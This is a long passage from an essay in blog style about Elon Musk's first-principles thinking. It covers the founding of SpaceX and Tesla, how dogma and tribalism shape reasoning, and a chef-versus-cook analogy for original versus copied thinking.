Conventional wisdom screamed at the top of its lungs for him to stop. It said he had no formal education in the field and didn’t know the first thing about being a rocket scientist. But his software told him that formal education was just another way to download information into your brain and “a painfully slow download” at that—so he started reading, meeting people, and asking questions.
Conventional wisdom said no entrepreneur had ever succeeded at an endeavor like this before, and that he shouldn’t risk his money on something so likely to fail. But Musk’s stated philosophy is, “When something is important enough, you do it even if the odds are not in your favor.”
Conventional wisdom said that he couldn’t afford to build rockets because they were too expensive and pointed to the fact that no one had ever made a rocket that cheaply before—but like the scientists who ignored those who said the Earth was 6,000 years old and those who insisted the Earth was flat, Musk started crunching numbers to do the math himself. Here’s how he recounts his thoughts:
Historically, all rockets have been expensive, so therefore, in the future, all rockets will be expensive. But actually that’s not true. If you say, what is a rocket made of? It’s made of aluminum, titanium, copper, carbon fiber. And you can break it down and say, what is the raw material cost of all these components? And if you have them stacked on the floor and could wave a magic wand so that the cost of rearranging the atoms was zero, then what would the cost of the rocket be? And I was like, wow, okay, it’s really small—it’s like 2% of what a rocket costs. So clearly it would be in how the atoms are arranged—so you’ve got to figure out how can we get the atoms in the right shape much more efficiently. And so I had a series of meetings on Saturdays with people, some of whom were still working at the big aerospace companies, just to try to figure out if there’s some catch here that I’m not appreciating. And I couldn’t figure it out. There doesn’t seem to be any catch. So I started SpaceX.6
History, conventional wisdom, and his friends all said one thing, but his own software, reasoning upwards from first principles, said another—and he trusted his software. He started SpaceX, again with his own money, and dove in head xfirst. The mission: dramatically lower the cost of space travel to make it possible for humanity to become multi-planetary.
Tesla and beyond
Two years later, while running a growing SpaceX, a friend brought Elon to a company called AC Propulsion, which had created a prototype for a super-fast, long-range electric car. It blew him away. The Reality box of Musk’s software had told him that such a thing wasn’t yet possible, but it turns out that Musk wasn’t aware of how far lithium-ion batteries had advanced, and what he saw at AC Propulsion was new information about the world that put “starting a top-notch electric car company” into the Reality box in his head.
He ran into the same conventional wisdom about battery costs as he had about rocket costs. Batteries had never been made cheaply enough to allow for a mass-market, long-range electric car because battery prices were simply too high and always would be. He used the same first principles logic and a calculator to determine that most of the problem was middlemen, not raw materials, and decided that actually, conventional wisdom was wrong and batteries could be much cheaper in the future. So he co-founded Tesla with the mission of accelerating the advent of a mostly-electric-vehicle world—first by pouring in resources power and funding the company, and later by contributing his time and energy resources as well and becoming CEO.
Two years after that, he co-founded SolarCity with his cousins, a company whose goal was to revolutionize energy production by creating a large, distributed utility that would install solar panel systems on millions of people’s homes. Musk knew that his time/energy power, the one kind of power that has hard limits, no matter who you are, was mostly used up, but he still had plenty of resources power—so he put it to work on another goal in his Goal Pool.
Most recently, Musk has jumpstarted change in another area that’s important to him—the way people transport themselves from city to city. His idea is that there should be an entirely new mode of transport that will whiz people hundreds of miles by zinging them through a tube. He calls it the Hyperloop. For this project, he’s not using his time, energy, or resources. Instead, by laying out his initial thoughts in a white paper and hosting a competition for engineers to test out their innovations, he’s leveraging his powers of connection and persuasion to create change.
There are all kinds of tech companies that build software. They think hard, for years, about the best, most efficient way to make their product. Musk sees people as computers, and he sees his brain software as the most important product he owns—and since there aren’t companies out there designing brain software, he designed his own, beta tests it every day, and makes constant updates. That’s why he’s so outrageously effective, why he can disrupt multiple huge industries at once, why he can learn so quickly, strategize so cleverly, and visualize the future so clearly.
This part of what Musk does isn’t rocket science—it’s common sense. Your entire life runs on the software in your head—why wouldn’t you obsess over optimizing it?
And yet, not only do most of us not obsess over our own software—most of us don’t even understand our own software, how it works, or why it works that way. Let’s try to figure out why.
Most People’s Software
You always hear facts about human development and how so much of who you become is determined by your experiences during your formative years. A newborn’s brain is a malleable ball of hardware clay, and its job upon being born is to quickly learn about whatever environment it’s been born into and start shaping itself into the optimal tool for survival in those circumstances. That’s why it’s so easy for young children to learn new skills.
As people age, the clay begins to harden and it becomes more difficult to change the way the brain operates. My grandmother has been using a computer as long as I have, but I use mine comfortably and easily because my malleable childhood brain easily wrapped itself around basic computer skills, while she has the same face on when she uses her computer that my tortoise does when I put him on top of a glass table and he thinks he’s inexplicably hovering two feet above the ground. She’ll use a computer when she needs to, but it’s not her friend.
So when it comes to our brain software—our values, perceptions, belief systems, reasoning techniques—what are we learning during those key early years?
Everyone’s raised differently, but for most people I know, it went something like this:
We were taught all kinds of things by our parents and teachers—what’s right and wrong, what’s safe and dangerous, the kind of person you should and shouldn’t be. But the idea was: I’m an adult so I know much more about this than you, it’s not up for debate, don’t argue, just obey. That’s when the cliché “Why?” game comes in (what ElonSpeak calls “the chained why”).
A child’s instinct isn’t just to know what to do and not to do, she wants to understand the rules of her environment. And to understand something, you have to have a sense of how that thing was built. When parents and teachers tell a kid to do XYZ and to simply obey, it’s like installing a piece of already-designed software in the kid’s head. When kids ask Why? and then Why? and then Why?, they’re trying to deconstruct that software to see how it was built—to get down to the first principles underneath so they can weigh how much they should actually care about what the adults seem so insistent upon.
The first few times a kid plays the Why game, parents think it’s cute. But many parents, and most teachers, soon come up with a way to cut the game off:
Because I said so.
“Because I said so” inserts a concrete floor into the child’s deconstruction effort below which no further Why’s may pass. It says, “You want first principles? There. There’s your floor. No more Why’s necessary. Now fucking put your boots on because I said so and let’s go.”
Imagine how this would play out in the science world.
Higgs Hawking 1Higgs Hawking 2Higgs Hawking 3
Higgs Hawking 5Higgs Hawking 6Higgs Hawking 8Higgs Hawking 9Higgs Hawking 10
In fairness, parents’ lives suck. They have to do all the shit they used to have to do, except now on top of that there are these self-obsessed, drippy little creatures they have to upkeep, who think parents exist to serve them. On a busy day, in a bad mood, with 80 things to do, the Why game is a nightmare.
But it might be a nightmare worth enduring. A command or a lesson or a word of wisdom that comes without any insight into the steps of logic it was built upon is feeding a kid a fish instead of teaching them to reason. And when that’s the way we’re brought up, we end up with a bucket of fish and no rod—a piece of installed software that we’ve learned how to use, but no ability to code anything ourselves.
School makes things worse. One of my favorite thinkers, writer Seth Godin (whose blog is bursting with first principles reasoning wisdom), explains in a TED Talk about school that the current education system is a product of the Industrial Age, a time that catapulted productivity and the standard of living. But along with many more factories came the need for many more factory workers, so our education system was redesigned around that goal. He explains:
The deal was: universal public education whose sole intent was not to train the scholars of tomorrow—we had plenty of scholars. It was to train people to be willing to work in the factory. It was to train people to behave, to comply, to fit in. “We process you for a whole year. If you are defective, we hold you back and process you again. We sit you in straight rows, just like they organize things in the factory. We build a system all about interchangeable people because factories are based on interchangeable parts.”
Couple that concept with what another favorite writer of mine, James Clear, explained recently on his blog:
In the 1960s, a creative performance researcher named George Land conducted a study of 1,600 five-year-olds and 98 percent of the children scored in the “highly creative” range. Dr. Land re-tested each subject during five year increments. When the same children were 10-years-old, only 30 percent scored in the highly creative range. This number dropped to 12 percent by age 15 and just 2 percent by age 25. As the children grew into adults they effectively had the creativity trained out of them. In the words of Dr. Land, “non-creative behavior is learned.”
It makes sense, right? Creative thinking is a close cousin of first principles reasoning. In both cases, the thinker needs to invent his own thought pathways. People think of creativity as a natural born talent, but it’s actually much more of a way of thinking—it’s the thinking version of painting onto a blank canvas. But to do that requires brain software that’s skilled and practiced at coming up with new things, and school trains us on the exact opposite thing—to follow the leader, single-file, and to get really good at taking tests. Instead of a blank canvas, school hands kids a coloring book and tells them to stay within the lines.3
What this all amounts to is that during our brain’s most malleable years, parents, teachers, and society end up putting our clay in a mold and squeezing it tightly into a preset shape.
And when we grow up, without having learned how to build our own style of reasoning and having gone through the early soul-searching that independent thinking requires, we end up needing to rely on whatever software was installed in us for everything—software that, coming from parents and teachers, was probably itself designed 30 years ago.
30 years, if we’re lucky. Let’s think about this for a second.
Just say you have an overbearing mother who insists you grow up with her values, her worldview, her fears, and her ambitions—because she knows best, because it’s a scary world out there, because XYZ is respectable, because she said so.
Your head might end up running your whole life on “because mom says so” software. If you play the Why? game with something like the reason you’re in your current job, it may take a few Why’s to get there, but you’ll most likely end up hitting a concrete floor that says some version of “because mom says so.”
But why does mom say so?
Mom says so because her mom said so—after growing up in Poland in 1932, where she was from a home where her dad said so because his dad—a minister from a small town outside Krakow—said so after his grandfather, who saw some terrible shit go down during the Siberian Uprising of 1866, ingrained in his children’s heads the critical life lesson to never associate with blacksmiths.
Through a long game of telephone, your mother now looks down upon office jobs and you find yourself feeling strongly about the only truly respectable career being in publishing. And you can list off a bunch of reasons why you feel that way—but if someone really grilled you on your reasons and on the reasoning beneath them, you end up in a confusing place. It gets confusing way down there because the first principles foundation at the bottom is a mishmash of the values and beliefs of a bunch of people from different generations and countries—a bunch of people who aren’t you.
A common example of this in today’s world is that many people I know were raised by people who were raised by people who went through the Great Depression. If you solicit career advice from someone born in the US in the 1920s, there’s a good chance you’ll get an answer pumped out by this software:
Grandma Software
The person has lived a long life and has made it all the way to 2015, but their software was coded during the Great Depression, and if they’re not the type to regularly self-reflect and evolve, they still do their thinking with software from 1930. And if they installed that same software in their children’s heads and their children then passed it on to their own children, a member of Generation Y today might feel too scared to pursue an entrepreneurial or artistic endeavor and be totally unaware that they’re actually being haunted by the ghost of the Great Depression.
When old software is installed on new computers, people end up with a set of values not necessarily based on their own deep thinking, a set of beliefs about the world not necessarily based on the reality of the world they live in, and a bunch of opinions they might have a hard time defending with an honest heart.
In other words, a whole lot of convictions not really based on actual data. We have a word for that.
Dogma
I don’t know what’s the matter with people: they don’t learn by understanding, they learn by some other way—by rote or something. Their knowledge is so fragile! —Richard Feynman
Dogma is everywhere and comes in a thousand different varieties—but the format is generally the same:
X is true because [authority] says so. The authority can be many things.
Because I said so 2
Dogma, unlike first principles reasoning, isn’t customized to the believer or her environment and isn’t meant to be critiqued and adjusted as things change. It’s not software to be coded—it’s a printed rulebook. Its rules may be originally based on reasoning by a certain kind of thinker in a certain set of circumstances, at a time far in the past or a place far away, or it may be based on no reasoning at all. But that doesn’t matter because you’re not supposed to dig too deep under the surface anyway—you’re just supposed to accept it, embrace it, and live by it. No evidence needed.
You may not like living by someone else’s dogma, but you’re left without much choice. When your childhood attempts at understanding are met with “Because I said so,” and you absorb the implicit message “Your own reasoning capability is shit, don’t even try, just follow these rules so you don’t fuck your life up,” you grow up with little confidence in your own reasoning process. When you’re never forced to build your own reasoning pathways, you’re able to skip the hard process of digging deep to discover your own values and the sometimes painful experience of testing those values in the real world and learning you want to adjust them—and so you grow up a total reasoning amateur.
Only strong reasoning skills can carve a unique life path, and without them, dogma will quickly have you living someone else’s life. Dogma doesn’t know you or care about you and is often completely wrong for you—it’ll have a would-be happy painter spending their life as a lawyer and a would-be happy lawyer spending their life as a painter.
But when you don’t know how to reason, you don’t know how to evolve or adapt. If the dogma you grew up with isn’t working for you, you can reject it, but as a reasoning amateur, going it alone usually ends with you finding another dogma lifeboat to jump onto—another rulebook to follow and another authority to obey. You don’t know how to code your own software, so you install someone else’s.
People don’t do any of this intentionally—usually if we reject a type of dogma, our intention is to break free of a life of dogmatic thinking all together and brave the cold winds of independent reasoning. But dogmatic thinking is a hard habit to break, especially when it’s all you know. I have a friend who just had a baby, and she told me that she was so much more open-minded than her parents, because they wanted her to have a prestigious career, but she’d be open to her daughter doing anything. After a minute, she thought about it, and said, “Well actually, no, what I mean by that is if she wanted to go do something like spend her life on a farm in Montana, I’d be fine with that and my parents never would have been—but if she said she wanted to go work at a hedge fund, I’d kill her.” She realized mid-sentence that she wasn’t free of the rigid dogmatic thinking of her parents, she had just changed dogma brands.
This is the dogma trap, and it’s hard to escape from. Especially since dogma has a powerful ally—the group.
Tribes
Some things I think are very conservative, or very liberal. I think when someone falls into one category for everything, I’m very suspicious. It doesn’t make sense to me that you’d have the same solution to every issue. —Louis C.K.
What most dogmatic thinking tends to boil down to is another good Seth Godin phrase:
People like us do stuff like this.
It’s the rallying cry of tribalism.
There’s an important distinction to make here. Tribalism tends to have a negative connotation, but the concept of a tribe itself isn’t bad. All a tribe is is a group of people linked together by something they have in common—a religion, an ethnicity, a nationality, family, a philosophy, a cause. Christianity is a tribe. The Democratic Party is a tribe. Australians are a tribe. Radiohead fans are a tribe. Arsenal fans are a tribe. The musical theater scene in New York is a tribe. Temple University is a tribe. And within large, loose tribes, there are smaller, tighter, sub-tribes. Your extended family is a tribe, of which your immediate family is a sub-tribe. Americans are a tribe, of which Texans are a sub-tribe, of which Evangelical Christians in Amarillo, Texas is a sub-sub-tribe.
What makes tribalism a good or bad thing depends on the tribe member and their relationship with the tribe. In particular, one simple distinction:
Tribalism is good when the tribe and the tribe member both have an independent identity and they happen to be the same. The tribe member has chosen to be a part of the tribe because it happens to match who he really is. If either the identity of the tribe or the member evolves to the point where the two no longer match, the person will leave the tribe. Let’s call this conscious tribalism.
Tribalism is bad when the tribe and tribe member’s identity are one and the same. The tribe member’s identity is determined by whatever the tribe’s dogma happens to say. If the identity of the tribe changes, the identity of the tribe member changes with it in lockstep. The tribe member’s identity can’t change independent of the tribal identity because the member has no independent identity. Let’s call this blind tribalism.
With conscious tribalism, the tribe member and his identity comes first. The tribe member’s identity is the alpha dog, and who he is determines the tribes he’s in. With blind tribalism, the tribe comes first. The tribe is the alpha dog and it’s the tribe that determines who he is.
This isn’t black and white—it’s a spectrum—but when someone is raised without strong reasoning skills, they may also lack a strong independent identity and end up vulnerable to the blind tribalism side of things—especially with the various tribes they were born into. That’s what Einstein was getting at when he said, “Few people are capable of expressing with equanimity opinions which differ from the prejudices of their social environment. Most people are even incapable of forming such opinions.”
A large tribe like a religion or a political party or a nation will contain members who fall across the whole range of the blind-to-conscious spectrum. But some tribes themselves will be the type to attract a certain type of follower. It makes logical sense that the more rigid and certain and dogmatic the tribe, the more likely it’ll be to attract blind tribe members. ISIS is going to have a far higher percentage of blind tribe members than the London Philosophy Club.
The allure of dogmatic tribes makes sense—they appeal to very core parts of human nature.
Humans crave connection and camaraderie, and a guiding dogma is a common glue to bond together a group of unique individuals as one.
Humans want internal security, and for someone who grows up feeling shaky about their own distinctive character, a tribe and its guiding dogma is a critical lifeline—a one-stop shop for a full suite of human opinions and values.
Humans also long for the comfort and safety of certainty, and nowhere is conviction more present than in the groupthink of blind tribalism. While a scientist’s data-based opinions are only as strong as the evidence she has and inherently subject to change, tribal dogmatism is an exercise in faith, and with no data to be beholden to, blind tribe members believe what they believe with certainty.
We discussed why math has proofs, science has theories, and in life, we should probably limit ourselves to hypotheses—but blind tribalism proceeds with the confidence of the mathematician:
Given (because the tribe says so): A = B
Given (because the tribe says so): B = C + D
Therefore (because the tribe says so): A = C + D
And since so many others in the tribe feel certain about things, your own certainty is reassured and reinforced.
But there’s a heavy cost to these comforts. Insecurity can be solved the hard way or the easy way—and by giving people the easy option, dogmatic tribes remove the pressure to do the hard work of evolving into a more independent person with a more internally-defined identity. In that way, dogmatic tribes are an enabler of the blind tribe member’s deficiencies.
The sneaky thing about both rigid tribal dogma and blind membership is that they like to masquerade as open-minded thought with conscious membership. I think many of us may be closer to the blind membership side of things with certain tribes we’re a part of than we recognize—and those tribes we’re a part of may not be as open-minded as we tend to think.
A good test for this is the intensity of the us factor. That key word in “People like us do stuff like this” can get you into trouble pretty quickly.
Us feels great. A major part of the appeal of being in a tribe is that you get to be part of an Us, something humans are wired to seek out. And loose Us is nice—like the Us among conscious, independent tribe members.
But the Us in blind tribalism is creepy. In blind tribalism, the tribe’s guiding dogma doubles as the identity of the tribe members, and the Us factor enforces that concept. Conscious tribe members reach conclusions—blind tribe members are conclusions. With a blind Us, if the way you are as an individual happens to contain opinions, traits, or principles that fall outside the outer edges of the dogma walls, they will need to be shed—or things will get ugly. By challenging the dogma of your tribe, you’re challenging both the sense of certainty the tribe members gain their strength from and the clear lines of identity they rely on.
The best friend of a blind Us is a nemesis Us—Them. Nothing unites Us like a collectively hated anti-Us, and the blind tribe is usually defined almost as much by hating the dogma of Them as it is by abiding by the dogma of Us.
Whatever element of rigid, identity-encompassing blindness is present in your own tribal life will reveal itself when you dare to validate any part of the rival Them dogma.
Give it a try. The next time you’re with a member of a tribe you’re a part of, express a change of heart that aligns you on a certain topic with whoever your tribe considers to be Them. If you’re a religious Christian, tell people at church you’re not sure anymore that there’s a God. If you’re an artist in Boulder, explain at the next dinner party that you think global warming might actually be a liberal hoax. If you’re an Iraqi, tell your family that you’re feeling pro-Israel lately. If you and your husband are staunch Republicans, tell him you’re coming around on Obamacare. If you’re from Boston, tell your friends you’re pulling for the Yankees this year because you like their current group of players.
If you’re in a tribe with a blind mentality of total certainty, you’ll probably see a look of horror. It won’t just seem wrong, it’ll seem like heresy. They might get angry, they might passionately try to convince you otherwise, they might cut off the conversation—but there will be no open-minded conversation. And because identity is so intertwined with beliefs in blind tribalism, the person actually might feel less close to you afterwards. Because for rigidly tribal people, a shared dogma plays a more important role in their close relationships than they might recognize.
Most of the major divides in our world emerge from blind tribalism, and on the extreme end of the spectrum—where people are complete sheep—blind tribalism can lead to terrifying things. Like those times in history when a few charismatic bad guys can build a large army of loyal foot soldiers, just by displaying strength and passion. Because blind tribalism the true villain behind our grandest-scale atrocities—
Equations
Most of us probably wouldn’t have joined the Nazi party, because most of us aren’t on the extreme end of the blind-to-conscious spectrum. But I don’t think many of us are on the other end either. Instead, we’re usually somewhere in the hazy middle—in the land of cooks.4
The Cook and the Chef
The difference between the way Elon thinks and the way most people think is kind of like the difference between a cook and a chef.
The words “cook” and “chef” seem kind of like synonyms. And in the real world, they’re often used interchangeably. But in this post, when I say chef, I don’t mean any ordinary chef. I mean the trailblazing chef—the kind of chef who invents recipes. And for our purposes, everyone else who enters a kitchen—all those who follow recipes—is a cook.
Everything you eat—every part of every cuisine we know so well—was at some point in the past created for the first time. Wheat, tomatoes, salt, and milk go back a long time, but at some point, someone said, “What if I take those ingredients and do this…and this…..and this……” and ended up with the world’s first pizza. That’s the work of a chef.
Since then, god knows how many people have made a pizza. That’s the work of a cook.
The chef reasons from first principles, and for the chef, the first principles are raw edible ingredients. Those are her puzzle pieces and she works her way upwards from there, using her experience, her instincts, and her taste buds.
The cook works off of some version of what’s already out there—a recipe of some kind, a meal she tried and liked, a dish she watched someone else make.
Cooks span a wide range. On one end, you have cooks who only cook by following a recipe to the T—carefully measuring every ingredient exactly the way the recipe dictates. The result is a delicious meal that tastes exactly the way the recipe has it designed. Down the range a bit, you have more of a confident cook—someone with experience who gets the general gist of the recipe and then uses her skills and instincts to do it her own way. The result is something a little more unique to her style that tastes like the recipe but not quite. At the far end of the cook range, you have an innovator who makes her own concoctions. A lamb burger with a vegetable bun, a peanut butter and jelly pizza, a cinnamon pumpkin seed cake.5
But what all of these cooks have in common is their starting point is something that already exists. Even the innovative cook is still making a version of a burger, a pizza, and a cake.
At the very end of the spectrum, you have the chef. A chef might make good food or terrible food, but whatever she makes, it’s a result of her own reasoning process, from the selection of raw ingredients at the bottom to the finished dish at the top.
Chef-Cook Spectrum
In the culinary world, there’s nothing wrong with being a cook. Most people are cooks because for most people, inventing recipes isn’t a goal of theirs.
But in life—when it comes to the reasoning “recipes” we use to churn out a decision—we may want to think twice about where we are on the cook-chef spectrum.
On a typical day, a “reasoning cook” and a “reasoning chef” don’t operate that differently. Even the chef becomes quickly exhausted by the mental energy required for first principles reasoning, and usually, doing so isn’t worth his time. Both types of people spend an average day with their brain software running on auto-pilot and their conscious decision-making centers dormant.
But then comes a day when something new needs to be figured out. Maybe the cook and the chef are each given the new task at work to create a better marketing strategy. Or maybe they’re unhappy with that job and want to think of what business to start. Maybe they have a crush on someone they never expected to have feelings for and they need to figure out what to do about it.
Whatever this new situation is, auto-pilot won’t suffice—this is something new and neither the chef’s nor the cook’s software has done this before. Which leaves only two options:
Create. Or copy.
The chef says, “Ugh okay, here we go,” rolls up his sleeves, and does what he always does in these situations—he switches on the active decision-making part of his software and starts to go to work. He looks at what data he has and seeks out what more he needs. He thinks about the current state of the world and reflects on where his values and priorities are. He gathers together those relevant first principles ingredients and starts puzzling together a reasoning pathway. It takes some hard work, but eventually, the pathway brings him to a hypothesis. He knows it’s probably wrong-ish, and as new data emerges, he’ll “taste-test” the hypothesis and adjust it. He keeps the decision-making center on standby for the next few weeks as he makes a bunch of early adjustments to the flawed hypothesis—a little more salt, a little less sugar, one prime ingredient that needs to be swapped out for another. Eventually, he’s satisfied enough with how things are going to move back into auto-pilot mode. This new decision is now part of the automated routine—a new recipe is in the cookbook—and he’ll check in on it to make adjustments every once in a while or as new pertinent data comes in, the way he does for all parts of his software.
The cook has no idea what’s going on in the last paragraph. The reasoning cook’s software is called “Because the recipe said so,” and it’s more of a computerized catalog of recipes than a computer program. When the cook needs to make a life decision, he goes through his collection of authority-written recipes, finds the one he trusts in that particular walk of life, and reads through the steps to see what to do—kind of like WWJD, except the J is replaced by whatever authority is most trusted in that area. For most questions, the authority is the tribe, since the cook’s tribal dogma covers most standard decisions. But in this particular case, the cook leafed through the tribe’s cookbook and couldn’t find any section about this type of decision. So he needs to get a hold of a recipe from another authority he trusts with this type of thing. Once the cook finds the right recipe, he can put it in his catalog and use it for all future decisions on this matter.
First, the cook tries a few friends. His catalog doesn’t have the needed info, but maybe one of theirs does. He asks them for their advice—not so he can use it as additional thinking to supplement his own, but so it can become his own thinking.
If that doesn’t yield any strongly-opinionated results, he’ll go to the trusty eternal backstop—conventional wisdom.
Society as a whole is its own loose tribe, often spanning your whole nation or even your whole part of the world, and what we call “conventional wisdom” is its guiding dogma cookbook—online and available to the public. Typically, the larger the tribe, the more general and more outdated the dogma—and the conventional wisdom database runs like a DMV website last updated in 1992. But when the cook has nowhere else to turn, it’s like a trusty old friend.
And in this case—let’s say the cook is thinking of starting a business and wants to know what the possibilities are—conventional wisdom has him covered. He types the command into the interface, waits a few minutes, and then the system pumps out its answer:
CWDOS
The cook, thoroughly discouraged, thanks the machine and updates his Reality box accordingly.
Cook reality box simple
With the decision made (not to start a business), he switches his software back into auto-pilot mode. Done and done.
Musk calls the cook’s way of thinking “reasoning by analogy” (as opposed to reasoning by first principles), which is a nice euphemism. The next time a kid gets caught copying answers from another student’s exam during the test, he should just explain that he was reasoning by analogy.
If you start looking for it, you’ll see the chef/cook thing happening everywhere. There are chefs and cooks in the worlds of music, art, technology, architecture,6 writing, business, comedy, marketing, app development, football coaching, teaching, and military strategy. Sometimes the chef is the one brave enough to go for something big—other times, the chef is the one with the strength of character to step out of the game and revert back to the small. And in each case, though both parties are usually just on autopilot, mindlessly playing the latest album again and again at concerts, it’s in those key moments when it’s time to write a new album—those moments of truth in front of a clean canvas, a blank Word doc, an empty playbook, a new sheet of blueprint paper, a fresh whiteboard—that the chef and the cook reveal their true colors. The chef creates, while the cook, in some form or another, copies.
Line of cooks
And the difference in outcome is enormous. For cooks, even the more innovative kind, there’s almost always a ceiling on the size of the splash they can make in the world, unless there’s some serious luck involved. Chefs aren’t guaranteed to do anything good, but when there’s a little talent and a lot of persistence, they’re almost certain to make a splash.
No one talks about the “reasoning industry,” but we’re all part of it, and when it comes to chefs and cooks, it’s no different than any other industry. We’re working in the reasoning industry every time we make a decision.
Your current life, with all its facets and complexity, is like a reasoning industry album. The question is, how did that set of songs come to be? How were the songs composed, and by whom? And in those critical do-or-die moments when it’s time to write a new song, how do you do your creating? Do you dig deep into yourself? Do you start with the drumbeat and chords of an existing song and write your own melody on top of it? Do you just play covers?
I know what you want the answers to these questions to be. This is a straightforward one—it’s clearly better to be a chef. But unlike the case with most major distinctions in life—hard-working vs. lazy, ethical vs. dishonest, considerate vs. selfish—when the chef/cook distinction passes right in front of us, we often don’t even notice it’s there.
Missing the Distinction
Like the culinary world’s cook-to-chef range, the real world’s cook-to-chef range isn’t binary—it lies on a spectrum:
Chef-Cook Life Spectrum
But I’m pretty sure that when most of us look at that spectrum, we think we’re farther to the right than we actually are. We’re usually more cook-like than we realize—we just can’t see it from where we’re standing.
For example—
Cooks are followers—by definition. They’re a cook because in whatever they’re doing, they’re following some kind of recipe. But most of us don’t think of ourselves as followers.
A follower, we think, is a weakling with no mind of their own. We think about leadership positions we’ve held and initiatives we’ve taken at work and the way we never let friends boss us around, and we take these as evidence that we’re no follower. Which in turn means that we’re not just a cook.
But the problem is—the only thing all of that proves is that you’re no follower within your tribe. As Einstein meanly put it:
In order to form an immaculate member of a flock of sheep one must, above all, be a sheep.
In other words, you might be a star and a leader in your world or in the eyes of your part of society, but if the core reason you picked that goal in the first place was because your tribe’s cookbook says that it’s an impressive thing and it makes the other tribe members gawk, you’re not being a leader—you’re being a super-successful follower. And, as Einstein says, no less of a cook than all those whom you’ve impressed.
To see the truth, you need to zoom way out until you can see the real leader of the cooks—the cookbook.
But we don’t tend to zoom out, and when we look around at our life, zoomed in, what appears to be a highly unique and independent self may be an optical illusion.7 What often feels like independent reasoning when zoomed out is actually playing connect-the-dots on a pre-printed set of steps laid out by someone else. What feel like personal principles might just be the general tenets of your tribe. What feel like original opinions may have actually been spoon-fed to us by the media or our parents or friends or our religion or a celebrity. What feels like Roark might actually be Keating. What feels like our chosen life path could just be one of a handful of pre-set, tribe-approved yellow brick roads. What feels like creativity might be filling in a coloring book—and making sure to stay inside the lines.
Because of this optical illusion, we’re unable to see the flaws in our own thinking or recognize an unusually great thinker when we see one. Instead, when a superbly science-minded, independent-thinking chef like Elon Musk or Steve Jobs or Albert Einstein comes around, what do we attribute their success to?
Awesome fucking hardware.
When we look at Musk, we see someone with genius, with vision, with superhuman balls. All things, we assume, he was more or less born with. So to us, the spectrum looks more like this:
Chef-Cook Life Spectrum Skewed
The way we see it, we’re all a bunch of independent-thinking chefs—and it’s just that Musk is a really impressive chef.
Which is both A) overrating Musk and B) overrating ourselves. And completely missing the real story.
Musk is an impressive chef for sure, but what makes him such an extreme standout isn’t that he’s impressive—it’s that most of us aren’t chefs at all.
It’s like a bunch of typewriters looking at a computer and saying, “Man, that is one talented typewriter.”
The reason we have such a hard time seeing what’s really going on is that we don’t get that brain software is even a thing. We don’t think of brains as computers, so we don’t think about the distinction between hardware and software at all. When we think about the brain, we think only about the hardware—the thing we’re born with and are powerless to change or improve. Much less tangible to us is the concept of how we reason. We see reasoning as a thing that just kind of happens, like our bodies’ blood flow—it’s a process that automatically happens, and there’s not much else to say or do about it.
And if we can’t even see the hardware/software distinction, we certainly can’t see the more nuanced chef software vs. cook software distinction.
By not seeing our thinking software for what it is—a critical life skill, something that can be learned, practiced, and improved, and the major factor that separates the people who do great things from those who don’t—we fail to realize where the game of life is really being played. We don’t recognize reasoning as a thing that can be created or copied—and in the same way that causes us to mistake our own cook-like behavior for independent reasoning, we then mistake the actual independent reasoning of the chef for exceptional and magical abilities.
Three examples:
1) We mistake the chef’s clear view of the present for vision into the future.
Musk’s sister Tosca said “Elon has already gone to the future and come back to tell us what he’s found.”7 This is how a lot of people feel about Musk—that he’s a visionary, that he can somehow see things we cannot. We see it like this:
Musk Visionary 1
But actually, it’s like this:
Musk Visionary 2
Conventional wisdom is slow to move, and there’s significant lag time between when something becomes reality and when conventional wisdom is revised to reflect that reality. And by the time it does, reality has moved on to something else. But chefs don’t pay attention to that, reasoning instead using their eyes and ears and experience. By ignoring conventional wisdom in favor of simply looking at the present for what it really is and staying up-to-date with the facts of the world as they change in real-time—in spite of what conventional wisdom has to say—the chef can act on information the rest of us haven’t been given permission to act on yet.
2) We mistake the chef’s accurate understanding of risk for courage.
Remember this ElonSpeak quote from earlier?
When I was a little kid, I was really scared of the dark. But then I came to understand, dark just means the absence of photons in the visible wavelength—400 to 700 nanometers. Then I thought, well it’s really silly to be afraid of a lack of photons. Then I wasn’t afraid of the dark anymore after that.8
That’s just a kid chef assessing the actual facts of a situation and deciding that his fear was misplaced.
As an adult, Musk said this:
Sometimes people fear starting a company too much. Really, what’s the worst that could go wrong? You’re not gonna starve to death, you’re not gonna die of exposure—what’s the worst that could go wrong?
Same quote, right?
In both cases, Musk is essentially saying, “People consider X to be scary, but their fear is not based on logic, so I’m not scared of X.” That’s not courage—that’s logic.
Courage means doing something risky. Risk means exposing yourself to danger. We intuitively understand this—that’s why most of us wouldn’t call child Elon courageous for sleeping with the lights off. Courage would be a weird word to use there because no actual danger was involved.
All Elon’s saying in the second quote is that being scared to start a company is the adult version of being scared of the dark. It’s not actually dangerous.
So when Musk put his entire fortune down and on SpaceX and Tesla, he wasn’t being bold as fuck, but courageous? Not the right word. It was a case of a chef taking a bunch of information he had and puzzling together a plan that seemed logical. It’s not that he was sure he’d succeed—in fact, he thought SpaceX in particular had a reasonable probability of failure—it’s just that nowhere in his assessments did he foresee danger.
3) We mistake the chef’s originality for brilliant ingenuity.
People believe thinking outside the box takes intelligence and creativity, but it’s mostly about independence. When you simply ignore the box and build your reasoning from scratch, whether you’re brilliant or not, you end up with a unique conclusion—one that may or may not fall within the box.
When you’re in a foreign country and you decide to ditch the guidebook and start wandering aimlessly and talking to people, unique things always end up happening. When people hear about those things, they’ll think of you as a pro traveler and a bold adventurer—when all you really did is ditch the guidebook.
Likewise, when an artist or scientist or businessperson chef reasons independently instead of by analogy, and their puzzling happens to both A) turn out well and B) end up outside the box, people call it innovation and marvel at the chef’s ingenuity. When it turns out really well, all the cooks do what they do best—copy—and now it’s called a revolution.
Simply by refraining from reasoning by analogy, the chef opens up the possibility of making a huge splash with every project. When Steve Jobs8 and Apple turned their attention to phones, they didn’t start by saying, “Okay well people seem to like this kind of keyboard more than that kind, and everyone seems unhappy with the difficulty of hitting the numbers on their keyboards—so let’s get creative and make the best phone keyboard yet!” They simply asked, “What should a mobile device be?” and in their from-scratch reasoning, a physical keyboard didn’t end up as part of the plan at all. It didn’t take genius to come up with the design of the iPhone—it’s actually pretty logical—it just took the ability to not copy.
Different version of the same story with the invention of the United States. When the American forefathers found themselves with a new country on their hands, they didn’t ask, “What should the rules be for selecting our king, and what should the limitations of his power be?” A king to them was what a physical keyboard was to Apple. Instead, they asked, “What should a country be and what’s the best way to govern a group of people?” and by the time they had finished their puzzling, a king wasn’t part of the picture—their first principles reasoning led them to believe that John Locke had a better plan and they worked their way up from there.
